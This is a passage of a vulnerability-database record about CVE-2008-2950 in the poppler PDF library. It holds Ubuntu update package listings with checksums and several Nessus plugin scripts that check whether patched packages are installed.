\r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 72662 2d208d0aa2e6fcc41a4124f5b1d7db2c\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 195288 2031b4483879873311a73cbfdf729a28\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 224464 c490f31e6a07a46edc5e1ebb9701c221\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 677306 8642fd84565922b7634352db04243c32\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_lpia.deb\r\n Size/MD5: 121850 8182b5f099f787d9ed4442bf7872bb30\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 1002844 04578e12f116e510b24b9e0d2d8ee090\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 164740 4d691d9ec4ad1087165cf11fd8e5d264\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 107298 cd6acf76d851f30182bdb1fa05bfcbc3\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 80398 81f8a5a2c956e6f828ae5cb2f9f17490\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 76332 7dc41341770257d938649c48e3d7e9fa\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 199780 6a302f61dbf30c67d98090d7d25a0dbd\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 237526 b1e2c21d1488139dced83c244a497398\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 732008 82591a4bd63db01bc91975509deb2f49\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_powerpc.deb\r\n Size/MD5: 141004 22878d01b622f6032c912b215e1606c0\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 909134 c7e4204e37f323af35fdbc1d097180e1\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 152728 07fc3f3bb10bb36a870253cd3f79a758\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 99818 70fba1d4419ceae5c1b478119e04850f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 76632 99dd6ddc6d32465402f7bf37f9308357\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 71458 18ccafdfb4dfbea92ea58264845f3e3b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 191570 673fa1300b3bc5127149e345e17751da\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 226710 ae220abf8c8286b532b00b65b4c9a758\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 674798 5ac9f44a610b2ff43678dec030b9eaf2\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6-0ubuntu2.3_sparc.deb\r\n Size/MD5: 120646 ef903a0096285b7f8787ef14c43374cc\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.4-1ubuntu3.1.diff.gz\r\n Size/MD5: 11034 801fe768d34b19c5fb5d8d876a4b4ebf\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.4-1ubuntu3.1.dsc\r\n Size/MD5: 1221 35bf3e37bcc90b9b039a173ca6a5731f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.6.4.orig.tar.gz\r\n Size/MD5: 1294481 13d12ca4e349574cfbbcf4a9b2b3ae52\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 892090 553ff6c4f74074e995de1c4ceadc4374\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 109066 9ac88a1bd737100d2e4dddcb4b4e9d03\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 54810 3a2895f4bfa4cb8be250ba29c98cea58\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 45366 8b8d9c43295b713f015973ae57701381\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 25526 ef379832248c2821003140c48822db9f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 146692 9e77fd6a5ef457923bd773e99b6f4386\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 200584 942ec772345a806de5d6d61e5efe5549\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 644846 236a0a4d87e441b5dd8eec894d7cc208\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_amd64.deb\r\n Size/MD5: 79032 3f2b6ea555e027cef9f14e7a1d46ff76\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 836578 16f0cc8ae631624d14091e8853422114\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 102824 179595cf6458285e1a2fd362ed3e9341\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 52320 6d4ed78b515b5447260fcff6abe5362a\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 41766 0e530837303727f8e6be6fd40d0ac78c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 25050 ebbdc3024c22581647aa90d53ef0136c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 143516 ca365941effdd98ea84329b2b5581f3c\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 189228 fc01186e6e77e1882f78de493159b36f\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 619600 d127d527e35d947bc24c7db58d865190\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_i386.deb\r\n Size/MD5: 73694 96f3e39b06f9387cc92bc46444c24639\r\n\r\n lpia architecture (Low Power Intel Architecture):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 856586 cca2260367e4d36a776d059df1b2db57\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 103760 d38e753b633b9c2a1a63b06459f34099\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 52558 0a8f18c8ee8eb5502bd58000f975f262\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 42182 1d10efadc4695ebbd4ff88123d17df98\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 24804 f7040efc7342bcd8e1b200a74a5590e5\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 145074 387ed2c8f6940de89545f0c96adc606f\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 190472 30b8d7f1fbdb8860a24cc71c66b60aca\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 632768 cd3bf5d700c013b250d612c1d1db5a11\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_lpia.deb\r\n Size/MD5: 74714 2129c0ed204b2ae04bbea1a70ab43992\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 955022 26ad8c76aa7d6d5baffacb0acb3565a3\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 115788 a0ad5fd01421395daf4664dc00586635\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 58450 a52e1f514efcbcf4ce0fe347e8c3caf3\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 45298 f2f0cf3f252ce7f60876c3ec848bd885\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 28864 6cf7cf00fed312d436163580434a6d21\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 152688 108505a8f59556e0a7ef86a6e69853d7\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 208608 77e7c025d9a6dbb7bf83586c31c94c29\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 681084 8eb4095778c5696983030cb3c9398527\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_powerpc.deb\r\n Size/MD5: 94436 0cb05fa30a9f0d5beb1c04921b1b1829\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 857552 38149e8ecc431ca392e1d9554835860f\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 104088 8ac009e507e678c542d5fc099b9d847f\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-glib2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 51390 e2d53e2d16e5b6d9157599e0d42e459e\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 41170 552e12af1774ae3d3eff64869cf2d692\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 23902 863c7c02aef704172afa53cd3f8568c5\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 145338 7b42f4a00d1bf8beb99dabd7eb2424cf\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler-qt4-dev_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 192370 0b530b09e35e68a135c88cc416c81eaf\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/libpoppler2_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 628426 0a8aaa072e34985b91102732443e29d8\r\n \r\nhttp://ports.ubuntu.com/pool/main/p/poppler/poppler-utils_0.6.4-1ubuntu3.1_sparc.deb\r\n Size/MD5: 72988 28ca78924531b76c5c32e5da8895492a\r\n", "modified": "2008-07-30T00:00:00", "published": "2008-07-30T00:00:00", "id": "SECURITYVULNS:DOC:20247", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20247", "title": "[USN-631-1] poppler vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:15", "bulletinFamily": "unix", "description": "Felipe Andres Manzano discovered that poppler did not correctly initialize certain page widgets. If a user were tricked into viewing a malicious PDF file, a remote attacker could exploit this to crash applications linked against poppler, leading to a denial of service.", "modified": "2008-07-28T00:00:00", "published": "2008-07-28T00:00:00", "id": "USN-631-1", "href": "https://usn.ubuntu.com/631-1/", "title": "poppler vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:11:07", "bulletinFamily": "scanner", "description": "Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 - use of an uninitialized pointer to call free() in Page::~Page (#454277) http://www.ocert.org/advisories/ocert-2008-007.html\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2008-7104.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=33847", "published": "2008-08-08T00:00:00", "title": "Fedora 8 : poppler-0.6.2-2.fc8 (2008-7104)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-7104.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(33847);\n script_version (\"1.17\");\n script_cvs_date(\"Date: 2018/12/24 10:14:26\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_bugtraq_id(30107);\n script_xref(name:\"FEDORA\", value:\"2008-7104\");\n\n script_name(english:\"Fedora 8 : poppler-0.6.2-2.fc8 (2008-7104)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix: Add upstream patch for CVE-2008-2950 / oCERT-2008-007 -\nuse of an uninitialized pointer to call free() in Page::~Page\n(#454277) http://www.ocert.org/advisories/ocert-2008-007.html\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.ocert.org/advisories/ocert-2008-007.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://ocert.org/advisories/ocert-2008-007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=454277\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-August/013410.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?31a04841\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected poppler package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:poppler\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"poppler-0.6.2-2.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:56", "bulletinFamily": "scanner", "description": "This update fixes an code execution bug. (CVE-2008-2950)", "modified": "2014-06-13T00:00:00", "published": "2009-07-21T00:00:00", "id": "SUSE_11_0_LIBPOPPLER-DEVEL-080703.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40041", "title": "openSUSE Security Update : libpoppler-devel (libpoppler-devel-77)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libpoppler-devel-77.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40041);\n script_version(\"$Revision: 1.10 $\");\n script_cvs_date(\"$Date: 2014/06/13 19:44:02 $\");\n\n script_cve_id(\"CVE-2008-2950\");\n\n script_name(english:\"openSUSE Security Update : libpoppler-devel (libpoppler-devel-77)\");\n script_summary(english:\"Check for the libpoppler-devel-77 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"This update fixes an code execution bug. (CVE-2008-2950)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=404955\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libpoppler-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-glib3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt4-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler-qt4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libpoppler3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:poppler-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-glib-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-glib3-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt2-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt3-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt4-3-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler-qt4-devel-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libpoppler3-0.8.2-1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"poppler-tools-0.8.2-1.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"poppler\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:11:39", "bulletinFamily": "scanner", "description": "A memory management issue was found in libpoppler by Felipe Andres Manzano that could allow for the execution of arbitrary code with the privileges of the user running a poppler-based application, if they opened a specially crafted PDF file (CVE-2008-2950).\n\nThe updated packages have been patched to correct this issue.", "modified": "2018-07-19T00:00:00", "id": "MANDRIVA_MDVSA-2008-146.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36531", "published": "2009-04-23T00:00:00", "title": "Mandriva Linux Security Advisory : poppler (MDVSA-2008:146)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2008:146. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36531);\n script_version (\"1.13\");\n script_cvs_date(\"Date: 2018/07/19 20:59:15\");\n\n script_cve_id(\"CVE-2008-2950\");\n script_xref(name:\"MDVSA\", value:\"2008:146\");\n\n script_name(english:\"Mandriva Linux Security Advisory : poppler (MDVSA-2008:146)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A memory management issue was found in libpoppler by Felipe Andres\nManzano that could allow for the execution of arbitrary code with the\nprivileges of the user running a poppler-based application, if they\nopened a specially crafted PDF file (CVE-2008-2950).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-glib2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt4-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler-qt4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64poppler2\");\n script_set_attribute(attribute:\"cpe\", 